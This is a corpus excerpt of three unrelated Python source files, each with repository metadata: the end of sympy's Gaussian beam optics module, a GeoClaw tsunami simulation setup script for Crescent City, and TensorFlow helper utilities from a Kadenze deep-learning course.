    >>> conjugate_gauss_beams(l, w_i, w_o, f=f)[2]
    f
    """
    #TODO add the other possible arguments
    wavelen, waist_in, waist_out = sympify((wavelen, waist_in, waist_out))
    mag = waist_out / waist_in
    z_r = waist2rayleigh(waist_in, wavelen)
    if len(kwargs) != 1:
        raise ValueError("The function expects only one named argument")
    # `dist` and `s_in` are reserved for future parametrizations; only
    # the focal length `f` is currently implemented.
    if 'dist' in kwargs or 's_in' in kwargs:
        raise NotImplementedError(filldedent('''
            Currently only focal length is supported as a parameter'''))
    if 'f' in kwargs:
        f = sympify(kwargs['f'])
        s_in = f * (1 - sqrt(1/mag**2 - z_r**2/f**2))
        s_out = gaussian_conj(s_in, z_r, f)[0]
    else:
        raise ValueError(filldedent('''
            The functions expects the focal length as a named argument'''))
    return (s_in, s_out, f)
#TODO
#def plot_beam():
# """Plot the beam radius as it propagates in space."""
# pass
#TODO
#def plot_beam_conjugation():
# """
# Plot the intersection of two beams.
#
# Represents the conjugation relation.
#
# See Also
# ========
#
# conjugate_gauss_beams
# """
# pass
| flacjacket/sympy | sympy/physics/gaussopt.py | Python | bsd-3-clause | 19,362 | [
"Gaussian"
] | e94939d7ae72d8d02d6b609d7029aa08557c2f35953b832b405a775c7caf1ffc |
"""
Module to set up run time parameters for Clawpack -- AMRClaw code.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy as np
# Times (seconds) used below to switch on gauges and refinement regions.
t_shelf = 3.2*3600 # time approaching continental slope
t_harbor = 3.5*3600 # time approaching harbor
# Abort early with a clear message if Clawpack's environment is not set up.
try:
    CLAW = os.environ['CLAW']
except:
    # NOTE(review): "enviornment" is a typo in this user-facing message;
    # left as-is here since this edit changes comments only.
    raise Exception("*** Must first set CLAW enviornment variable")
# Scratch directory for storing topo and dtopo files:
scratch_dir = os.path.join(CLAW, 'geoclaw', 'scratch')
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------
    """
    Define the parameters used for running Clawpack.

    INPUT:
        claw_pkg expected to be "geoclaw" for this setrun.

    OUTPUT:
        rundata - object of class ClawRunData

    The returned object is later written out as the *.data files read by
    the Fortran code.
    """
    from clawpack.clawutil import data
    assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"
    num_dim = 2
    rundata = data.ClawRunData(claw_pkg, num_dim)
    #------------------------------------------------------------------
    # GeoClaw specific parameters:
    #------------------------------------------------------------------
    rundata = setgeo(rundata)
    #------------------------------------------------------------------
    # Adjoint specific data:
    #------------------------------------------------------------------
    rundata = setadjoint(rundata)
    #------------------------------------------------------------------
    # Standard Clawpack parameters to be written to claw.data:
    #------------------------------------------------------------------
    clawdata = rundata.clawdata # initialized when rundata instantiated
    # Set single grid parameters first.
    # See below for AMR parameters.
    # ---------------
    # Spatial domain:
    # ---------------
    # Number of space dimensions:
    clawdata.num_dim = num_dim
    # Lower and upper edge of computational domain (degrees lon/lat --
    # coordinate_system=2 is set in setgeo):
    clawdata.lower[0] = 140.0 # xlower
    clawdata.upper[0] = 250.0 # xupper
    clawdata.lower[1] = 10.0 # ylower
    clawdata.upper[1] = 62.0 # yupper
    # Number of grid cells (1-degree cells on the coarsest level):
    clawdata.num_cells[0] = 110 # mx
    clawdata.num_cells[1] = 52 # my
    # ---------------
    # Size of system:
    # ---------------
    # Number of equations in the system:
    clawdata.num_eqn = 3
    # Number of auxiliary variables in the aux array (initialized in setaux)
    clawdata.num_aux = 3
    # Index of aux array corresponding to capacity function, if there is one:
    clawdata.capa_index = 2
    # -------------
    # Initial time:
    # -------------
    clawdata.t0 = 0.0
    # Restart from checkpoint file of a previous run?
    # Note: If restarting, you must also change the Makefile to set:
    # RESTART = True
    # If restarting, t0 above should be from original run, and the
    # restart_file 'fort.chkNNNNN' specified below should be in
    # the OUTDIR indicated in Makefile.
    clawdata.restart = False # True to restart from prior results
    clawdata.restart_file = 'fort.chk00006' # File to use for restart data
    # -------------
    # Output times:
    #--------------
    # Specify at what times the results should be written to fort.q files.
    # Note that the time integration stops after the final output time.
    clawdata.output_style = 1
    if clawdata.output_style==1:
        # Output ntimes frames at equally spaced times up to tfinal:
        # Can specify num_output_times = 0 for no output
        # 22 frames over 11 hours => one frame every half hour.
        clawdata.num_output_times = 22
        clawdata.tfinal = 11*3600.
        clawdata.output_t0 = False # output at initial (or restart) time?
    elif clawdata.output_style == 2:
        # Specify a list or numpy array of output times:
        # Include t0 if you want output at the initial time.
        clawdata.output_times = list(np.linspace(3600,3600*9,9))
    elif clawdata.output_style == 3:
        # Output every step_interval timesteps over total_steps timesteps:
        clawdata.output_step_interval = 1
        clawdata.total_steps = 1
        clawdata.output_t0 = True # output at initial (or restart) time?
    clawdata.output_format = 'binary' # 'ascii', 'binary', 'netcdf'
    clawdata.output_q_components = 'all' # could be list such as [True,True]
    clawdata.output_aux_components = 'none' # could be list
    clawdata.output_aux_onlyonce = True # output aux arrays only at t0
    # ---------------------------------------------------
    # Verbosity of messages to screen during integration:
    # ---------------------------------------------------
    # The current t, dt, and cfl will be printed every time step
    # at AMR levels <= verbosity. Set verbosity = 0 for no printing.
    # (E.g. verbosity == 2 means print only on levels 1 and 2.)
    clawdata.verbosity = 0
    # --------------
    # Time stepping:
    # --------------
    # if dt_variable==True: variable time steps used based on cfl_desired,
    # if dt_variable==False: fixed time steps dt = dt_initial always used.
    clawdata.dt_variable = True
    # Initial time step for variable dt.
    # (If dt_variable==0 then dt=dt_initial for all steps)
    clawdata.dt_initial = 1
    # Max time step to be allowed if variable dt used:
    clawdata.dt_max = 1e+99
    # Desired Courant number if variable dt used
    clawdata.cfl_desired = 0.75
    # max Courant number to allow without retaking step with a smaller dt:
    clawdata.cfl_max = 1.0
    # Maximum number of time steps to allow between output times:
    clawdata.steps_max = 5000
    # ------------------
    # Method to be used:
    # ------------------
    # Order of accuracy: 1 => Godunov, 2 => Lax-Wendroff plus limiters
    clawdata.order = 2
    # Use dimensional splitting? (not yet available for AMR)
    clawdata.dimensional_split = 'unsplit'
    # For unsplit method, transverse_waves can be
    # 0 or 'none' ==> donor cell (only normal solver used)
    # 1 or 'increment' ==> corner transport of waves
    # 2 or 'all' ==> corner transport of 2nd order corrections too
    clawdata.transverse_waves = 2
    # Number of waves in the Riemann solution:
    clawdata.num_waves = 3
    # List of limiters to use for each wave family:
    # Required: len(limiter) == num_waves
    # Some options:
    # 0 or 'none' ==> no limiter (Lax-Wendroff)
    # 1 or 'minmod' ==> minmod
    # 2 or 'superbee' ==> superbee
    # 3 or 'vanleer' ==> van Leer
    # 4 or 'mc' ==> MC limiter
    clawdata.limiter = ['vanleer', 'vanleer', 'vanleer']
    clawdata.use_fwaves = True # True ==> use f-wave version of algorithms
    # Source terms splitting:
    # src_split == 0 or 'none' ==> no source term (src routine never called)
    # src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
    # src_split == 2 or 'strang' ==> Strang (2nd order) splitting used, not recommended.
    clawdata.source_split = 1
    # --------------------
    # Boundary conditions:
    # --------------------
    # Number of ghost cells (usually 2)
    clawdata.num_ghost = 2
    # Choice of BCs at xlower and xupper:
    # 0 or 'user' => user specified (must modify bcNamr.f to use this option)
    # 1 or 'extrap' => extrapolation (non-reflecting outflow)
    # 2 or 'periodic' => periodic (must specify this at both boundaries)
    # 3 or 'wall' => solid wall for systems where q(2) is normal velocity
    clawdata.bc_lower[0] = 'extrap' # at xlower
    clawdata.bc_upper[0] = 'extrap' # at xupper
    clawdata.bc_lower[1] = 'extrap' # at ylower
    clawdata.bc_upper[1] = 'extrap' # at yupper
    # ---------------
    # gauges:
    # ---------------
    gauges = rundata.gaugedata.gauges
    # for gauges append lines of the form [gaugeno, x, y, t1, t2]
    # Gauges only start recording once the wave nears them (t_shelf /
    # t_harbor are module-level constants defined above).
    # Outside harbor:
    gauges.append([1, 235.536, 41.67, t_shelf, 1.e10])
    # Inside harbor:
    gauges.append([2, 235.80917,41.74111,t_harbor, 1.e10])
    # --------------
    # Checkpointing:
    # --------------
    # Specify when checkpoint files should be created that can be
    # used to restart a computation.
    clawdata.checkpt_style = 0
    if clawdata.checkpt_style == 0:
        # Do not checkpoint at all
        pass
    elif clawdata.checkpt_style == 1:
        # Checkpoint only at tfinal.
        pass
    elif clawdata.checkpt_style == 2:
        # Specify a list of checkpoint times.
        clawdata.checkpt_times = [0.1,0.15]
    elif clawdata.checkpt_style == 3:
        # Checkpoint every checkpt_interval timesteps (on Level 1)
        # and at the final time.
        clawdata.checkpt_interval = 5
    # ---------------
    # AMR parameters: (written to amr.data)
    # ---------------
    amrdata = rundata.amrdata
    # max number of refinement levels:
    amrdata.amr_levels_max = 4
    # List of refinement ratios at each level (length at least amr_level_max-1)
    # NOTE(review): 5 entries are listed but amr_levels_max=4 only uses the
    # first 3; the extras allow bumping amr_levels_max without editing these.
    amrdata.refinement_ratios_x = [5, 6, 6, 3, 30]
    amrdata.refinement_ratios_y = [5, 6, 6, 3, 30]
    amrdata.refinement_ratios_t = [5, 6, 6, 3, 4]
    # Specify type of each aux variable in amrdata.auxtype.
    # This must be a list of length num_aux, each element of which is one of:
    # 'center', 'capacity', 'xleft', or 'yleft' (see documentation).
    amrdata.aux_type = ['center', 'capacity', 'yleft']
    # Flag for refinement based on Richardson error estimater:
    amrdata.flag_richardson = False # use Richardson?
    amrdata.flag_richardson_tol = 1.0 # Richardson tolerance
    # Flag for refinement using routine flag2refine:
    amrdata.flag2refine = True # use this?
    amrdata.flag2refine_tol = 0.004 # tolerance used in this routine
    # Note: this tolerance is not used in the surface-flagging method
    # only the wave_tolerance is used (a geoclaw specific parameters)
    # steps to take on each level L between regriddings of level L+1:
    amrdata.regrid_interval = 3
    # width of buffer zone around flagged points:
    # (typically the same as regrid_interval so waves don't escape):
    amrdata.regrid_buffer_width = 2
    # clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
    # (closer to 1.0 => more small grids may be needed to cover flagged cells)
    amrdata.clustering_cutoff = 0.7
    # print info about each regridding up to this level:
    amrdata.verbosity_regrid = 0
    # ---------------
    # Regions:
    # ---------------
    regions = rundata.regiondata.regions
    # to specify regions of refinement append lines of the form
    # [minlevel,maxlevel,t1,t2,x1,x2,y1,y2]
    # NOTE(review): the last two regions request levels 5-6 while
    # amr_levels_max is 4 above; presumably levels are capped at
    # amr_levels_max unless it is raised -- confirm intended behavior.
    regions.append([1, 1, 0., 1e9, 0, 360, -90, 90]) #whole world
    regions.append([1, 3, 0., 7*3600., 0, 360, -90, 90]) #whole world
    regions.append([1, 3, 7*3600.,10*3600., 170., 360, 18, 90])
    regions.append([1, 3, 10*3600.,1e9, 195., 360, -90, 90])
    regions.append([4, 4, 0., 1800, 175, 195, 50, 54]) #earthquake source AASZ04
    regions.append([3, 4, t_shelf, 1e9, 235, 238, 34, 43]) # between shelf and CC
    regions.append([4, 4, t_shelf, 1e9, 235, 236, 41, 42])
    regions.append([5, 5, t_shelf, 1e9, 235.5,235.83,41.6,41.8]) #only harbor
    regions.append([5, 6, t_harbor, 1e9, 235.78,235.84,41.735,41.775]) #only harbor
    # ----- For developers -----
    # Toggle debugging print statements:
    amrdata.dprint = False # print domain flags
    amrdata.eprint = False # print err est flags
    amrdata.edebug = False # even more err est flags
    amrdata.gprint = False # grid bisection/clustering
    amrdata.nprint = False # proper nesting output
    amrdata.pprint = False # proj. of tagged points
    amrdata.rprint = False # print regridding summary
    amrdata.sprint = False # space/memory output
    amrdata.tprint = False # time step reporting each level
    amrdata.uprint = False # update/upbnd reporting
    return rundata
    # end of function setrun
    # ----------------------
#-------------------
def setgeo(rundata):
    """
    Set GeoClaw specific runtime parameters.

    Fills in the ``geo_data``, ``refinement_data``, ``topo_data``,
    ``dtopo_data``, ``qinit_data`` and ``fixed_grid_data`` attributes of
    *rundata* in place and returns the same object.

    Raises AttributeError if *rundata* has no ``geo_data`` attribute.
    """
    try:
        geo_data = rundata.geo_data
    except AttributeError:
        # Fixed: the original used a Python 2 print statement (a syntax
        # error under Python 3) and a bare ``except:``; print() works on
        # both 2.7 and 3.x for a single string argument.
        print("*** Error, this rundata has no geo_data attribute")
        raise AttributeError("Missing geo_data attribute")
    # == Physics ==
    geo_data.gravity = 9.81
    geo_data.coordinate_system = 2       # 2 => longitude/latitude coordinates
    geo_data.earth_radius = 6367500.0
    # == Forcing Options
    geo_data.coriolis_forcing = False
    # == Algorithm and Initial Conditions ==
    # Sea level relative to MHW; tide_stage=77 corresponds to MHW itself.
    tide_stage = 77.
    geo_data.sea_level = (tide_stage - 77.)/100. # m relative to MHW
    geo_data.dry_tolerance = 0.001
    geo_data.friction_forcing = True
    geo_data.manning_coefficient = 0.025
    geo_data.friction_depth = 100.0
    # Refinement settings
    refinement_data = rundata.refinement_data
    refinement_data.variable_dt_refinement_ratios = True
    refinement_data.wave_tolerance = 0.09
    refinement_data.deep_depth = 100.0
    refinement_data.max_level_deep = 4
    # == settopo.data values ==
    topofiles = rundata.topo_data.topofiles
    # for topography, append lines of the form
    # [topotype, minlevel, maxlevel, t1, t2, fname]
    topofiles.append([3, 1, 1, 0., 1.e10,
                      scratch_dir + '/etopo1min170E124W40N61N.asc'])
    topofiles.append([3, 1, 1, 0., 1.e10,
                      scratch_dir + '/etopo4min120E110W0N62N.asc'])
    # High-resolution Crescent City topo only needed once the wave
    # approaches (t1 = 32000 s).
    topofiles.append([-3, 1, 1, 32000, 1.e10, scratch_dir + '/cc-1sec-c.asc'])
    topofiles.append([3, 1, 1, 32000, 1.e10,
                      scratch_dir + '/cc-1_3sec-c_pierless.asc'])
    # == setdtopo.data values ==
    rundata.dtopo_data.dtopofiles = []
    dtopofiles = rundata.dtopo_data.dtopofiles
    # for moving topography, append lines of the form :
    # [topotype, minlevel,maxlevel,fname]
    dtopodir = scratch_dir + '/'
    dtopotype = 3
    fname = dtopodir + 'AASZ04v2.tt3'
    dtopofiles.append([dtopotype, 3, 3, fname])
    # == setqinit.data values ==
    rundata.qinit_data.qinit_type = 0
    rundata.qinit_data.qinitfiles = []
    qinitfiles = rundata.qinit_data.qinitfiles
    # for qinit perturbations, append lines of the form: (<= 1 allowed for now!)
    # [minlev, maxlev, fname]
    # == fixedgrids.data values ==
    rundata.fixed_grid_data.fixedgrids = []
    fixedgrids = rundata.fixed_grid_data.fixedgrids
    # for fixed grids append lines of the form
    # [t1,t2,noutput,x1,x2,y1,y2,xpoints,ypoints,\
    # ioutarrivaltimes,ioutsurfacemax]
    # == fgmax.data values ==
    fgmax_files = rundata.fgmax_data.fgmax_files
    return rundata
# end of function setgeo
# ----------------------
#-------------------
def setadjoint(rundata):
    """
    Read in all of the checkpointed adjoint solution files.

    Scans ``adjoint/_output`` for checkpoint-time files (``fort.tck*``)
    and records, in a new ``adjointdata`` user data block on *rundata*,
    the number of checkpoints plus one (file, time) parameter pair per
    checkpoint. Returns the same *rundata* object.
    """
    import glob
    files = sorted(glob.glob("adjoint/_output/fort.tck*"))
    probdata = rundata.new_UserData(name='adjointdata',fname='adjoint.data')
    probdata.add_param('numadjoints', len(files), 'Number of adjoint checkpoint files.')
    for counter, fname in enumerate(files, start=1):
        # The checkpoint time is the last token on the first line of the
        # tck file. Fixed: the file handle was previously never closed.
        with open(fname) as f:
            time = f.readline().split()[-1]
        chkname = '../' + fname.replace('tck','chk')
        probdata.add_param('file' + str(counter), chkname, 'Checkpoint file' + str(counter))
        probdata.add_param('time' + str(counter), float(time), 'Time for file' + str(counter))
    return rundata
# end of function setadjoint
# ----------------------
if __name__ == '__main__':
    # Set up run-time parameters and write all data files.
    import sys
    # Any command-line argument is forwarded to setrun as claw_pkg.
    rundata = setrun(*sys.argv[1:])
    rundata.write()
| clawpack/adjoint | paper1_examples/tsunami_Alaska/compare/setrun_sflag_lowtol.py | Python | bsd-2-clause | 16,061 | [
"NetCDF"
] | e2ebf51f70089a6c7017e00be3f7a99e9239f3b04b97342c3e971c1e0794c060 |
"""Utilities used in the Kadenze Academy Course on Deep Learning w/ Tensorflow.
Creative Applications of Deep Learning w/ Tensorflow.
Kadenze, Inc.
Parag K. Mital
Copyright Parag K. Mital, June 2016.
"""
import matplotlib.pyplot as plt
import tensorflow as tf
import urllib
import numpy as np
import zipfile
import os
from scipy.io import wavfile
def download(path):
    """Use urllib to download a file.

    Parameters
    ----------
    path : str
        Url to download

    Returns
    -------
    path : str
        Location of downloaded file.
    """
    import os
    from six.moves import urllib

    # The local file name is the last component of the URL; skip the
    # download entirely if it is already present.
    target = path.split('/')[-1]
    if os.path.exists(target):
        return target

    print('Downloading ' + path)

    def progress(count, block_size, total_size):
        # Only report every 20th block to keep console output light.
        if count % 20 == 0:
            print('Downloaded %02.02f/%02.02f MB' % (
                count * block_size / 1024.0 / 1024.0,
                total_size / 1024.0 / 1024.0), end='\r')

    filepath, _ = urllib.request.urlretrieve(
        path, filename=target, reporthook=progress)
    return filepath
def download_and_extract_tar(path, dst):
    """Download and extract a tar file.

    Parameters
    ----------
    path : str
        Url to tar file to download.
    dst : str
        Location to save tar file contents.
    """
    import tarfile
    filepath = download(path)
    if not os.path.exists(dst):
        os.makedirs(dst)
    # Fixed: the archive handle was previously never closed; the context
    # manager guarantees it is released even if extraction fails.
    with tarfile.open(filepath, 'r:gz') as archive:
        archive.extractall(dst)
def download_and_extract_zip(path, dst):
    """Download and extract a zip file.

    Parameters
    ----------
    path : str
        Url to zip file to download.
    dst : str
        Location to save zip file contents.
    """
    import zipfile
    filepath = download(path)
    if not os.path.exists(dst):
        os.makedirs(dst)
    # Fixed: the ZipFile handle was previously never closed; the context
    # manager guarantees it is released even if extraction fails.
    with zipfile.ZipFile(file=filepath) as zf:
        zf.extractall(dst)
def load_audio(filename, b_normalize=True):
    """Load the audiofile at the provided filename using scipy.io.wavfile.

    Optionally normalizes the audio to the maximum value and removes the
    mean; the sample rate returned by wavfile is discarded.

    Parameters
    ----------
    filename : str
        File to load.
    b_normalize : bool, optional
        Normalize to the maximum value.
    """
    _, samples = wavfile.read(filename)
    if not b_normalize:
        return samples
    samples = samples.astype(np.float32)
    samples = samples / np.max(np.abs(samples))
    samples -= np.mean(samples)
    return samples
def corrupt(x):
    """Take an input tensor and add uniform masking.

    Each element is multiplied by an independent 0/1 value drawn
    uniformly, so roughly half of the entries are zeroed out.

    Parameters
    ----------
    x : Tensor/Placeholder
        Input to corrupt.

    Returns
    -------
    x_corrupted : Tensor
        50 pct of values corrupted.
    """
    mask = tf.random_uniform(shape=tf.shape(x),
                             minval=0,
                             maxval=2,
                             dtype=tf.int32)
    return tf.multiply(x, tf.cast(mask, tf.float32))
def interp(l, r, n_samples):
    """Intepolate between the arrays l and r, n_samples times.

    Parameters
    ----------
    l : np.ndarray
        Left edge
    r : np.ndarray
        Right edge
    n_samples : int
        Number of samples

    Returns
    -------
    arr : np.ndarray
        Inteporalted array of shape (n_samples,) + shape of l.
    """
    # Fixed: the original raised ZeroDivisionError for n_samples == 1;
    # a single sample is simply the left edge.
    if n_samples == 1:
        return np.array([l])
    return np.array([
        l + step_i / (n_samples - 1) * (r - l)
        for step_i in range(n_samples)])
def make_latent_manifold(corners, n_samples):
    """Create a 2d manifold out of the provided corners: n_samples * n_samples.

    Parameters
    ----------
    corners : list of np.ndarray
        The four corners to intepolate.
    n_samples : int
        Number of samples to use in interpolation.

    Returns
    -------
    arr : np.ndarray
        Stacked array of all 2D interpolated samples
    """
    # Interpolate down the two vertical edges, then across each row.
    left_edge = interp(corners[0], corners[1], n_samples)
    right_edge = interp(corners[2], corners[3], n_samples)
    rows = [interp(left_edge[row_i], right_edge[row_i], n_samples)
            for row_i in range(n_samples)]
    return np.vstack(rows)
def imcrop_tosquare(img):
    """Make any image a square image.

    Center-crops the first two axes down to the smaller of the two; a
    square input is returned unchanged.

    Parameters
    ----------
    img : np.ndarray
        Input image to crop, assumed at least 2d.

    Returns
    -------
    crop : np.ndarray
        Cropped image.
    """
    side = np.min(img.shape[:2])
    result = img
    for axis, length in enumerate(img.shape[:2]):
        if length == side:
            continue
        # Drop an equal margin from both ends (extra pixel goes to the end).
        start = (length - side) // 2
        result = np.take(result, np.arange(start, start + side), axis=axis)
    return result
def slice_montage(montage, img_h, img_w, n_imgs):
    """Slice a montage image into n_img h x w images.

    Performs the opposite of the montage function. Takes a montage image and
    slices it back into a N x H x W x C image.

    Parameters
    ----------
    montage : np.ndarray
        Montage image to slice.
    img_h : int
        Height of sliced image
    img_w : int
        Width of sliced image
    n_imgs : int
        Number of images to slice

    Returns
    -------
    sliced : np.ndarray
        Sliced images as 4d array.
    """
    # The montage is a side x side grid of tiles with 1-pixel borders.
    side = int(np.sqrt(n_imgs))
    tiles = []
    for row in range(side):
        top = 1 + row + row * img_h
        for col in range(side):
            left = 1 + col + col * img_w
            tiles.append(montage[top:top + img_h, left:left + img_w])
    return np.array(tiles)
def montage(images, saveto='montage.png'):
    """Draw all images as a montage separated by 1 pixel borders.

    Also saves the file to the destination specified by `saveto`.

    Parameters
    ----------
    images : numpy.ndarray
        Input array to create montage of. Array should be:
        batch x height x width x channels.
    saveto : str
        Location to save the resulting montage image.

    Returns
    -------
    m : numpy.ndarray
        Montage image.
    """
    if isinstance(images, list):
        images = np.array(images)
    img_h = images.shape[1]
    img_w = images.shape[2]
    n_plots = int(np.ceil(np.sqrt(images.shape[0])))
    # Mid-gray (0.5) canvas, with one border pixel around every tile.
    canvas_h = images.shape[1] * n_plots + n_plots + 1
    canvas_w = images.shape[2] * n_plots + n_plots + 1
    if len(images.shape) == 4 and images.shape[3] == 3:
        m = np.ones((canvas_h, canvas_w, 3)) * 0.5
    else:
        m = np.ones((canvas_h, canvas_w)) * 0.5
    for i in range(n_plots):
        for j in range(n_plots):
            idx = i * n_plots + j
            if idx < images.shape[0]:
                top = 1 + i + i * img_h
                left = 1 + j + j * img_w
                m[top:top + img_h, left:left + img_w] = images[idx]
    plt.imsave(arr=m, fname=saveto)
    return m
def montage_filters(W):
    """Draws all filters (n_input * n_output filters) as a
    montage image separated by 1 pixel borders.

    Parameters
    ----------
    W : Tensor
        Input tensor to create montage of.

    Returns
    -------
    m : numpy.ndarray
        Montage image.
    """
    # Fold the (input, output) channel pair into a single trailing axis
    # so every filter can be tiled individually.
    W = np.reshape(W, [W.shape[0], W.shape[1], 1, W.shape[2] * W.shape[3]])
    n_plots = int(np.ceil(np.sqrt(W.shape[-1])))
    filt_h, filt_w = W.shape[0], W.shape[1]
    m = np.ones((filt_h * n_plots + n_plots + 1,
                 filt_w * n_plots + n_plots + 1)) * 0.5
    for i in range(n_plots):
        for j in range(n_plots):
            idx = i * n_plots + j
            if idx < W.shape[-1]:
                top = 1 + i + i * filt_h
                left = 1 + j + j * filt_w
                m[top:top + filt_h,
                  left:left + filt_w] = np.squeeze(W[:, :, :, idx])
    return m
def get_celeb_files(dst='img_align_celeba', max_images=100):
    """Download the first `max_images` images of the celeb dataset.

    Files will be placed in a directory 'img_align_celeba' if one
    doesn't exist.

    Parameters
    ----------
    dst : str
        Directory to store the downloaded images in.
    max_images : int
        Number of images to download.

    Returns
    -------
    files : list of strings
        Locations to the first `max_images` images of the celeb net dataset.
    """
    # Fixed: the module-level `import urllib` does not reliably expose
    # `urllib.request` on Python 3; import the submodule explicitly.
    from urllib.request import urlretrieve

    # Create a directory
    if not os.path.exists(dst):
        os.mkdir(dst)

    # Now perform the following max_images times:
    for img_i in range(1, max_images + 1):
        # create a string using the current loop counter
        f = '000%03d.jpg' % img_i
        if not os.path.exists(os.path.join(dst, f)):
            # and get the url with that string appended the end
            url = 'https://s3.amazonaws.com/cadl/celeb-align/' + f
            # We'll print this out to the console so we can see how far we've gone
            print(url, end='\r')
            # And now download the url to a location inside our new directory
            urlretrieve(url, os.path.join(dst, f))
    files = [os.path.join(dst, file_i)
             for file_i in os.listdir(dst)
             if '.jpg' in file_i][:max_images]
    return files
def get_celeb_imgs(max_images=100):
    """Load the first `max_images` images of the celeb dataset.

    Returns
    -------
    imgs : list of np.ndarray
        List of the first `max_images` images from the celeb dataset
    """
    # Download (if necessary) and then decode each file with matplotlib.
    paths = get_celeb_files(max_images=max_images)
    return [plt.imread(path) for path in paths]
def gauss(mean, stddev, ksize):
    """Use Tensorflow to compute a Gaussian Kernel.

    The kernel is evaluated at ksize points spanning [-3, 3].

    Parameters
    ----------
    mean : float
        Mean of the Gaussian (e.g. 0.0).
    stddev : float
        Standard Deviation of the Gaussian (e.g. 1.0).
    ksize : int
        Size of kernel (e.g. 16).

    Returns
    -------
    kernel : np.ndarray
        Computed Gaussian Kernel using Tensorflow.
    """
    g = tf.Graph()
    with tf.Session(graph=g):
        x = tf.linspace(-3.0, 3.0, ksize)
        # Fixed: the original used the truncated literal 3.1415 for pi,
        # slightly skewing the normalization constant 1/(stddev*sqrt(2*pi)).
        z = (tf.exp(tf.negative(tf.pow(x - mean, 2.0) /
                                (2.0 * tf.pow(stddev, 2.0)))) *
             (1.0 / (stddev * tf.sqrt(2.0 * np.pi))))
        return z.eval()
def gauss2d(mean, stddev, ksize):
    """Use Tensorflow to compute a 2D Gaussian Kernel.

    Parameters
    ----------
    mean : float
        Mean of the Gaussian (e.g. 0.0).
    stddev : float
        Standard Deviation of the Gaussian (e.g. 1.0).
    ksize : int
        Size of kernel (e.g. 16).

    Returns
    -------
    kernel : np.ndarray
        Computed 2D Gaussian Kernel using Tensorflow.
    """
    # The separable 2D kernel is the outer product of the 1D kernel
    # with itself.
    kernel_1d = gauss(mean, stddev, ksize)
    g = tf.Graph()
    with tf.Session(graph=g):
        col = tf.reshape(kernel_1d, [ksize, 1])
        row = tf.reshape(kernel_1d, [1, ksize])
        return tf.matmul(col, row).eval()
def convolve(img, kernel):
    """Use Tensorflow to convolve a 4D image with a 4D kernel.

    Parameters
    ----------
    img : np.ndarray
        4-dimensional image shaped N x H x W x C
    kernel : np.ndarray
        4-dimensional image shape K_H, K_W, C_I, C_O corresponding to the
        kernel's height and width, the number of input channels, and the
        number of output channels. Note that C_I should = C.

    Returns
    -------
    result : np.ndarray
        Convolved result.
    """
    g = tf.Graph()
    with tf.Session(graph=g):
        # 'SAME' padding keeps the spatial dimensions of the input.
        result = tf.nn.conv2d(img, kernel,
                              strides=[1, 1, 1, 1], padding='SAME')
        return result.eval()
def gabor(ksize=32):
    """Use Tensorflow to compute a 2D Gabor Kernel.

    Modulates a unit 2-D Gaussian (gauss2d) with a horizontal sine
    wave, yielding a Gabor filter.

    Parameters
    ----------
    ksize : int, optional
        Size of kernel.

    Returns
    -------
    gabor : np.ndarray
        Gabor kernel with ksize x ksize dimensions.
    """
    g = tf.Graph()
    with tf.Session(graph=g):
        z_2d = gauss2d(0.0, 1.0, ksize)
        ones = tf.ones((1, ksize))
        # Column of sine values replicated across each row of the kernel.
        ys = tf.sin(tf.linspace(-3.0, 3.0, ksize))
        ys = tf.reshape(ys, [ksize, 1])
        wave = tf.matmul(ys, ones)
        # Elementwise product of the wave and the Gaussian envelope.
        gabor = tf.multiply(wave, z_2d)
        return gabor.eval()
def build_submission(filename, file_list, optional_file_list=()):
    """Helper utility to check homework assignment submissions and package them.

    Warns about any missing required file, then zips everything under the
    current directory whose name ends with an entry of `file_list` or
    `optional_file_list`.

    Parameters
    ----------
    filename : str
        Output zip file name
    file_list : tuple
        Tuple of files to include.  Must be a tuple (not a list) because
        it is passed directly to str.endswith below.
    optional_file_list : tuple, optional
        Additional file suffixes to include without a missing-file warning.
    """
    # check each file exists
    for part_i, file_i in enumerate(file_list):
        if not os.path.exists(file_i):
            # Only warns; the zip is still created with whatever exists.
            print('\nYou are missing the file {}. '.format(file_i) +
                  'It does not look like you have completed Part {}.'.format(
                      part_i + 1))

    def zipdir(path, zf):
        # Recursively add matching files under `path` to the open zip `zf`.
        for root, dirs, files in os.walk(path):
            for file in files:
                # make sure the files are part of the necessary file list
                if file.endswith(file_list) or file.endswith(optional_file_list):
                    zf.write(os.path.join(root, file))

    # create a zip file with the necessary files
    zipf = zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED)
    zipdir('.', zipf)
    zipf.close()
    print('Your assignment zip file has been created!')
    print('Now submit the file:\n{}\nto Kadenze for grading!'.format(
        os.path.abspath(filename)))
def normalize(a, s=0.1):
    """Normalize the image range for visualization.

    Centers `a` on 0.5 in units of `s` standard deviations (with a
    floor of 1e-4 on the std to avoid division by zero), clips to
    [0, 1], and rescales to 8-bit values.
    """
    safe_std = max(a.std(), 1e-4)
    centered = (a - a.mean()) / safe_std * s + 0.5
    clipped = np.clip(centered, 0, 1)
    return np.uint8(clipped * 255)
# %%
def weight_variable(shape, **kwargs):
    '''Helper function to create a weight variable initialized with
    a normal distribution (mean 0.0, stddev 0.01).

    Parameters
    ----------
    shape : list
        Size of weight variable.  A Python list is stacked into a
        tensor first so the static shape can still be set on the result.
    **kwargs
        Forwarded to tf.Variable (e.g. name, trainable).
    '''
    if isinstance(shape, list):
        initial = tf.random_normal(tf.stack(shape), mean=0.0, stddev=0.01)
        # Re-attach the static shape lost by going through tf.stack.
        initial.set_shape(shape)
    else:
        initial = tf.random_normal(shape, mean=0.0, stddev=0.01)
    return tf.Variable(initial, **kwargs)
# %%
def bias_variable(shape, **kwargs):
    '''Helper function to create a bias variable.

    NOTE(review): despite the historical docstring claiming "a constant
    value", this draws from a random normal (mean 0.0, stddev 0.01),
    identically to weight_variable — confirm whether that is intended.

    Parameters
    ----------
    shape : list
        Size of bias variable.
    **kwargs
        Forwarded to tf.Variable (e.g. name, trainable).
    '''
    if isinstance(shape, list):
        initial = tf.random_normal(tf.stack(shape), mean=0.0, stddev=0.01)
        # Re-attach the static shape lost by going through tf.stack.
        initial.set_shape(shape)
    else:
        initial = tf.random_normal(shape, mean=0.0, stddev=0.01)
    return tf.Variable(initial, **kwargs)
